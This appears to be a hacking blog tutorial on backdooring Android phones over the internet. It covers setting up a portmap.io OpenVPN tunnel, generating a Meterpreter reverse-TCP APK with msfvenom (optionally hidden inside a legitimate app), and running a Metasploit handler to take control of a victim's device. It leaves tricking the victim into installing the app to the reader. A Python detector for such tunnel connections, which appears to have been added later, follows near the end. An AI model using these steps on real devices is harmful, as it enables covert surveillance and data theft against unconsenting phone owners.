Hacking Android over WAN And Using Portmap.io to sustain the Backdoor

Hey guys,
In this blog post, we are going to see how to hack an Android device using a backdoor APK, so that we may gain access to it anytime.

Note: the victim has to install the malicious app; this post only covers what to do before and after installation. It is up to your intelligence to make the victim install the app.

OK, first let me explain what we are going to do.

Normally on a LAN, we create a malicious file and have it executed on a machine in our local network. There we can use our private IP as the address the connection returns to. On a WAN that doesn't work: you need port forwarding, so that when a connection is received on a public IP at a specific port, it is redirected to you on your local port.

We are going to use a public VPN to get traffic routed to our device.
So you will need:
- Metasploit Framework
- OpenVPN

If you don't understand that, just leave it and let's get our hands dirty.

Since both tools are available for most platforms, this works almost everywhere, even on Android in Termux.

We are going to use a free public service called portmap.io, and yeah, as you probably guessed, free and public comes with some limitations.

First create an account here
www.portmap.io/register

Then Login to your account in
www.portmap.io/login

[Screenshot: Portmap.io login screen]

After logging in, go to Configurations in the top navigation bar.

[Screenshot: Configurations in the navigation bar]

Next, click on the Create New Configuration button.

[Screenshot: Create New Configuration button]

Next, it asks for some details; fill them in as follows:

Name    - anything you wish
Type    - OpenVPN
Proto   - TCP
Comment - just for your reference

[Screenshot: Generating the configuration]

Click on the Generate button.

After generating the config file, download it to your machine.
This file is what gives you access to the public VPN service.

Then click on Create to create the configuration.

[Screenshot: New configuration added]

Next we have to create mapping rules. Click on Mapping Rules in the navigation bar.

This is the rule that says something like: "Ah! A packet for cyberraw69, get this packet to him on port <port you forwarded>."

[Screenshot: Mapping Rules in the navigation bar]

Then click on Create a New Rule.

[Screenshot: Creating a new rule]

Again, it asks for some important details; fill these in carefully:

Configuration   - the default; free accounts are limited to it
Protocol        - TCP
Hostname        - <your username> on portmap.io or portmap.host (whichever you wish)
Port on portmap - cannot be changed
Port on PC      - anything you wish; remember this port well, you need it when you run the payload handler
Allowed IP      - optional (works like a firewall)

[Screenshot: Creating a rule]

Then click on Create to create the rule.

[Screenshot: Mapping rule added]

Aaah, if you followed everything as mentioned, the work in the browser is over and you may close it, as long as you remember what is in the above screenshot.

Now we are going to act like a hacker: open the terminal :)

Navigate to where you downloaded the configuration file (from the first step).

cd Downloads
ls

Then run OpenVPN using that configuration file:

sudo openvpn --config mrfucker755.cyberraw69.ovpn
[Screenshot: Running OpenVPN]

It stops at the line saying "Initialization Sequence Completed".
That means everything so far went correctly. Good job, read on.

Do not close this terminal; this is what routes the traffic from portmap.io to you. Just minimize it and open another terminal.

Now we are going to generate the malicious APK file using msfvenom:

msfvenom -p android/meterpreter/reverse_tcp LHOST=mrfucker755-47939.portmap.host LPORT=47939 R > Backdoor.apk

Do you recognize the LHOST? It is the hostname from the Mapping Rules page. Type it in if you remember it, otherwise look back.

[Screenshot: Generating the malicious app]

You can also embed the payload in a legitimate APK using the -x option:

msfvenom -p android/meterpreter/reverse_tcp -x <legit app> LHOST=mrfucker755-47939.portmap.host LPORT=47939 -o Backdoor.apk

This doesn't work on all legitimate apps because of secure coding practices.

Now start the Metasploit Framework:

msfconsole

Set the necessary options as follows:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <tun0-IP>
set LPORT <Port you gave in mapping rules>

To get the IP address of the VPN interface:

ifconfig tun0
[Screenshot: Running ifconfig tun0]

Put in your tun0 IP as LHOST. For the LPORT, it should be the same as the "Port on PC" you gave in the mapping rule. If the port is below 1024 you would need to be root, so better stick with the default 4444 or use 8080. At last, everything is set and you may run the exploit:

run

Now the handler is started and waiting for connections.

[Screenshot: Running the exploit]

Now it's your turn: install the app on the victim's device. After installing, you will find the app listed as MainActivity. Tap the application, and you will see a connection coming in to your handler.

[Screenshot: Popping the shell]

And congrats!! You popped a shell on that device.

To view all the commands, type in:

help

You may run any of the commands listed. If you get an error running a command, close the existing session and open a new one (press Ctrl+C in the Meterpreter session and tap the app once more).

There are other free port forwarding services too; two that I know of are:
- ngrok
- serveo

Ngrok is good for static things like running a website, but for this use case, when you terminate ngrok you have to redo the whole process, because the port changes every time you run ngrok.

Serveo is good and it doesn't even need an account. It is somewhat similar to portmap.io, but it uses a different mechanism called SSH forwarding. I plan to write about it in the future, so stay tuned.

The advantage of this setup is that when you get something like
Meterpreter Session Closed — Reason died

you do not need to redo everything; you just tap the app again. The app will keep routing connections to you as long as you have OpenVPN and the msf handler running.
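From the defender's side, the pattern this post relies on is an app on the device holding an outbound TCP connection to a hostname handed out by a free tunnelling service (portmap.io, ngrok or serveo as named here) or to the default Metasploit handler port. The following is an added example, not code from the original post; the log format, the sample lines and the hostname suffixes are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed log format (an assumption, not the output of any real tool):
#   <time> pkg=<package> dst=<host>:<port> state=<ESTABLISHED|CLOSED>
LOG_RE = re.compile(
    r"^(?P<time>\S+) pkg=(?P<pkg>\S+) dst=(?P<host>[^:\s]+):(?P<port>\d+) "
    r"state=(?P<state>\w+)$"
)

# Hostname suffixes assumed for the services named in the post.
TUNNEL_SUFFIXES = (".portmap.host", ".portmap.io", ".ngrok.io", ".serveo.net")

# Default Metasploit handler port mentioned in the post.
SUSPICIOUS_PORTS = {4444}


def parse_line(line):
    """Parse one log line into a dict, or return None if it is malformed."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["host"] = rec["host"].lower()
    return rec


def classify(rec):
    """Return the list of reasons this connection looks suspicious."""
    reasons = []
    if rec["host"].endswith(TUNNEL_SUFFIXES):
        reasons.append("tunnel-service destination")
    if rec["port"] in SUSPICIOUS_PORTS:
        reasons.append("default handler port")
    return reasons


def find_suspicious(lines):
    """Map each package with a hit to its sorted reasons (established only)."""
    hits = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["state"] != "ESTABLISHED":
            continue  # skip malformed lines and closed connections
        for reason in classify(rec):
            hits[rec["pkg"]].add(reason)
    return {pkg: sorted(rs) for pkg, rs in hits.items()}


SAMPLE_LOG = [  # constructed sample lines
    "2024-05-01T10:00:00 pkg=com.example.mainactivity dst=demo-31337.portmap.host:31337 state=ESTABLISHED",
    "2024-05-01T10:00:01 pkg=com.android.chrome dst=www.example.org:443 state=ESTABLISHED",
    "2024-05-01T10:00:02 pkg=com.example.mainactivity dst=203.0.113.7:4444 state=CLOSED",
    "2024-05-01T10:00:03 pkg=com.example.other dst=203.0.113.8:4444 state=ESTABLISHED",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for pkg, reasons in find_suspicious(SAMPLE_LOG).items():
        print(f"{pkg}: {', '.join(reasons)}")
```

Any package flagged here deserves a look at its permissions and install source; a genuine app rarely needs a long-lived connection to a personal tunnelling hostname.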

So that's it, thanks for reading, hope you learned something.

If you have problems, please watch this video:
https://www.youtube.com/watch?v=9bqt5QA48Z4

If you want to know what's happening behind the scenes, message me on Twitter: @n00bie4
